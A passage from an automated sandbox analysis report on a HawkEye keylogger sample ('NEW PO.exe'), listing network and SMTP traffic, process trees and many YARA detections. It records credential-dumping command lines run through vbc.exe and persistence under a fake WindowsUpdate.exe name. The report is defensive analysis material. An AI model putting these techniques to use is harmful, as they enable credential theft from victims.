Oct 28, 2021 14:43:47.071824074 CEST	1169	IN	HTTP/1.1 403 Forbidden Date: Thu, 28 Oct 2021 12:43:47 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: keep-alive X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 6a5440731a042c52-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 28, 2021 14:43:15.111594915 CEST	587	49749	194.152.32.10	192.168.2.3	220 mail.inbox.lv relay for customers ESMTP ready
Oct 28, 2021 14:43:15.118011951 CEST	49749	587	192.168.2.3	194.152.32.10	EHLO 051829
Oct 28, 2021 14:43:15.160445929 CEST	587	49749	194.152.32.10	192.168.2.3	250-mail.inbox.lv relay for customers 250-SIZE 59900000 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Oct 28, 2021 14:43:15.162899017 CEST	49749	587	192.168.2.3	194.152.32.10	STARTTLS
Oct 28, 2021 14:43:15.209489107 CEST	587	49749	194.152.32.10	192.168.2.3	220 2.0.0 Start TLS
Oct 28, 2021 14:43:51.831136942 CEST	587	49760	194.152.32.10	192.168.2.3	220 mail.inbox.lv relay for customers ESMTP ready
Oct 28, 2021 14:43:51.837745905 CEST	49760	587	192.168.2.3	194.152.32.10	EHLO 051829
Oct 28, 2021 14:43:51.880465031 CEST	587	49760	194.152.32.10	192.168.2.3	250-mail.inbox.lv relay for customers 250-SIZE 59900000 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Oct 28, 2021 14:43:51.880744934 CEST	49760	587	192.168.2.3	194.152.32.10	STARTTLS
Oct 28, 2021 14:43:51.923423052 CEST	587	49760	194.152.32.10	192.168.2.3	220 2.0.0 Start TLS

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: NEW PO.exe PID: 7156 Parent PID: 4972

General

Start time:	14:42:57
Start date:	28/10/2021
Path:	C:\Users\user\Desktop\NEW PO.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\NEW PO.exe'
Imagebase:	0xeb0000
File size:	774144 bytes
MD5 hash:	770F6E88B7BF3FE3AAE144A5AA41DC96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.296608068.0000000003321000.00000004.00000001.sdmp, Author: Joe Security Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: NEW PO.exe PID: 6044 Parent PID: 7156

General

Start time:	14:43:05
Start date:	28/10/2021
Path:	C:\Users\user\Desktop\NEW PO.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\NEW PO.exe
Imagebase:	0x600000
File size:	774144 bytes
MD5 hash:	770F6E88B7BF3FE3AAE144A5AA41DC96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000007.00000000.320473195.0000000007EE0000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000000.318319979.0000000002DF6000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000000.313426139.0000000003AA1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000000.313426139.0000000003AA1000.00000004.00000001.sdmp, Author: Joe Security Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000000.317923125.0000000002D5E000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000007.00000000.317923125.0000000002D5E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000007.00000002.366905535.0000000007C60000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000000.317941479.0000000002D6A000.00000004.00000001.sdmp, Author: Joe Security Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000007.00000000.315132026.0000000007C60000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000007.00000000.315200782.0000000007EE0000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000000.313223758.0000000002D6A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000000.313404967.0000000002DFA000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000000.318371710.0000000003AA1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000000.318371710.0000000003AA1000.00000004.00000001.sdmp, Author: Joe Security Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000000.313199266.0000000002D5E000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000007.00000000.313199266.0000000002D5E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000002.362315745.0000000002ADF000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000007.00000002.362315745.0000000002ADF000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000007.00000002.367050092.0000000007EE0000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000002.364013571.0000000003AA1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000002.364013571.0000000003AA1000.00000004.00000001.sdmp, Author: Joe Security Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000007.00000000.320411963.0000000007C60000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000002.362383688.0000000002B10000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 6692 Parent PID: 6044

General

Start time:	14:43:15
Start date:	28/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Imagebase:	0x400000
File size:	1171592 bytes
MD5 hash:	C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.316195444.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.317013131.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.316648058.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 6728 Parent PID: 6044

General

Start time:	14:43:15
Start date:	28/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Imagebase:	0x400000
File size:	1171592 bytes
MD5 hash:	C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000000.319742971.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000000.320558066.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000000.320160730.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 6724 Parent PID: 6044

General

Start time:	14:43:20
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 2424
Imagebase:	0x20000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: WindowsUpdate.exe PID: 6976 Parent PID: 3352

General

Start time:	14:43:25
Start date:	28/10/2021
Path:	C:\Users\user\AppData\Roaming\WindowsUpdate.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\WindowsUpdate.exe'
Imagebase:	0x780000
File size:	774144 bytes
MD5 hash:	770F6E88B7BF3FE3AAE144A5AA41DC96
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000F.00000002.356792870.0000000002C01000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: WindowsUpdate.exe PID: 7120 Parent PID: 6976

General

Start time:	14:43:28
Start date:	28/10/2021
Path:	C:\Users\user\AppData\Roaming\WindowsUpdate.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\WindowsUpdate.exe
Imagebase:	0x710000
File size:	774144 bytes
MD5 hash:	770F6E88B7BF3FE3AAE144A5AA41DC96
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: WindowsUpdate.exe PID: 4816 Parent PID: 3352

General

Start time:	14:43:33
Start date:	28/10/2021
Path:	C:\Users\user\AppData\Roaming\WindowsUpdate.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\WindowsUpdate.exe'
Imagebase:	0xc00000
File size:	774144 bytes
MD5 hash:	770F6E88B7BF3FE3AAE144A5AA41DC96
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000011.00000002.373074864.0000000003171000.00000004.00000001.sdmp, Author: Joe Security Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: WindowsUpdate.exe PID: 3996 Parent PID: 4816

General

Start time:	14:43:39
Start date:	28/10/2021
Path:	C:\Users\user\AppData\Roaming\WindowsUpdate.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\WindowsUpdate.exe
Imagebase:	0xdd0000
File size:	774144 bytes
MD5 hash:	770F6E88B7BF3FE3AAE144A5AA41DC96
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000012.00000000.391647562.000000000358E000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000012.00000000.391647562.000000000358E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000012.00000000.400119443.000000000359A000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000012.00000000.400119443.000000000359A000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000012.00000002.439571003.0000000008640000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp, Author: Joe Security Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000012.00000000.395440509.0000000008660000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000012.00000000.395401347.0000000008640000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000012.00000000.399998942.000000000358E000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000012.00000000.399998942.000000000358E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000012.00000000.392059792.00000000035EA000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000002.436080566.00000000042D1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000012.00000002.436080566.00000000042D1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, 